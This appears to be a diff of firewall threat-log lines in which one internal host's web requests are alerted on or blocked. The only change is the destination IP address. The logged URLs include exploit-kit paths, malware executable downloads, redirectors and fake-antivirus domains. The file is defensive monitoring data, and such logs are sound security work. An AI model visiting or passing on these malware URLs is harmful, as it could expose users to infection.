1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,22860,1,59303,80,0,0,0x208000,tcp,alert,"litetopdetect.cn/index.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 
04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26360,1,59304,80,0,0,0x208000,tcp,alert,"lkmpmlm.com/fff9999.php?aid=0&uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1&os=513",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25543,1,59297,80,0,0,0x208000,tcp,alert,"girlteenxxxfreemov.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25437,1,59299,80,0,0,0x208000,tcp,alert,"imagesrepository.com/resolution.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26338,1,59298,80,0,0,0x208000,tcp,alert,"hottestfiles.com/search/search.php?q=xxx",(9999),search-engines,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:55,25713,1,59300,80,0,0,0x200000,tcp,block-url,"infodist1.com/in.cgi?11¶meter=404",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25451,1,59295,80,0,0,0x208000,tcp,alert,"cls-softwares.com/suc.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26414,1,59291,80,0,0,0x208000,tcp,alert,"cls-softwares.com/softwarefortubeview.40013.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,"lorexx.cn/loader.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26067,1,59313,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=2",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 
04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26522,1,59314,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=5",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=7",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/exploits/x18.php?o=2&t=1241403746&i=1365814122",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/exploits/x19.php?o=2&t=1241403746&i=1365814122",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:56,24910,1,59302,80,0,0,0x208000,tcp,alert,"liteautobestguide.cn/load.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26862,1,59301,80,0,0,0x208000,tcp,alert,"liteautobestguide.cn/index.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,22860,1,59303,80,0,0,0x208000,tcp,alert,"litetopdetect.cn/index.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26360,1,59304,80,0,0,0x208000,tcp,alert,"lkmpmlm.com/fff9999.php?aid=0&uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1&os=513",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25543,1,59297,80,0,0,0x208000,tcp,alert,"girlteenxxxfreemov.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 
04:39:53,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25437,1,59299,80,0,0,0x208000,tcp,alert,"imagesrepository.com/resolution.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26338,1,59298,80,0,0,0x208000,tcp,alert,"hottestfiles.com/search/search.php?q=xxx",(9999),search-engines,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25713,1,59300,80,0,0,0x200000,tcp,block-url,"infodist1.com/in.cgi?11¶meter=404",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25451,1,59295,80,0,0,0x208000,tcp,alert,"cls-softwares.com/suc.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26414,1,59291,80,0,0,0x208000,tcp,alert,"cls-softwares.com/softwarefortubeview.40013.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United 
States,0,text/html Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,78.159.99.224,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26927,1,59296,80,0,0,0x200000,tcp,block-url,"findmorepill.com/klik/search.php?q=xxx",(9999),online-gambling,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Germany,0, -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26127,1,59280,80,0,0,0x208000,tcp,alert,"allowedwebsurfing.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,25306,1,59281,80,0,0,0x208000,tcp,alert,"antivirus-remote.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24561,1,59282,80,0,0,0x208000,tcp,alert,"bklinkov.ru/hi/start.cfg",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:52,15099,1,59290,80,0,0,0x208000,tcp,alert,"blogsexnakedgirlxxx.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24955,1,59286,80,0,0,0x208000,tcp,alert,"bklinkov.ru/hi/start.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25398,1,59275,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25945,1,59277,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,27111,1,59276,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:50,25871,1,59278,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26251,1,59279,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,24816,1,59271,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25062,1,59269,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,26266,1,59270,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:48,23898,1,59274,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25259,1,59273,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26466,1,59272,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26127,1,59280,80,0,0,0x208000,tcp,alert,"allowedwebsurfing.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,25306,1,59281,80,0,0,0x208000,tcp,alert,"antivirus-remote.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:52,24561,1,59282,80,0,0,0x208000,tcp,alert,"bklinkov.ru/hi/start.cfg",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,15099,1,59290,80,0,0,0x208000,tcp,alert,"blogsexnakedgirlxxx.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24955,1,59286,80,0,0,0x208000,tcp,alert,"bklinkov.ru/hi/start.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25398,1,59275,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25945,1,59277,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 
04:39:47,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,27111,1,59276,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25871,1,59278,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26251,1,59279,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,24816,1,59271,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25062,1,59269,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 
04:39:45,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,26266,1,59270,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,23898,1,59274,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25259,1,59273,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26466,1,59272,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html Oct 30 09:46:47 1,2012/10/30 09:46:47,01606001116,THREAT,url,1,2012/04/10 04:39:43,192.168.0.2,69.43.161.167,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:44,4086,1,59261,80,0,0,0x200000,tcp,block-url,"wantfinest.com/tds/in.cgi?default",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 
04:39:38,192.168.0.2,202.31.187.154,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:39,26534,1,59248,80,0,0,0x200000,tcp,block-url,"sameshitasiteverwas.com/traf/tds/in.cgi?2",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Korea Republic Of,0, Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 04:39:39,192.168.0.2,89.111.176.67,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:40,26965,1,59251,80,0,0,0x200000,tcp,block-url,"svarkon.ru/update.exe",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, -Oct 30 09:47:12 1,2012/10/30 09:47:12,01606001116,THREAT,url,1,2012/04/10 04:39:36,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:37,26076,1,59244,80,0,0,0x200000,tcp,block-url,"onlinescanxpp.com/land/eurl/1.php?code=",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:47:12 1,2012/10/30 09:47:12,01606001116,THREAT,url,1,2012/04/10 04:39:36,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:37,26076,1,59244,80,0,0,0x200000,tcp,block-url,"onlinescanxpp.com/land/eurl/1.php?code=",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 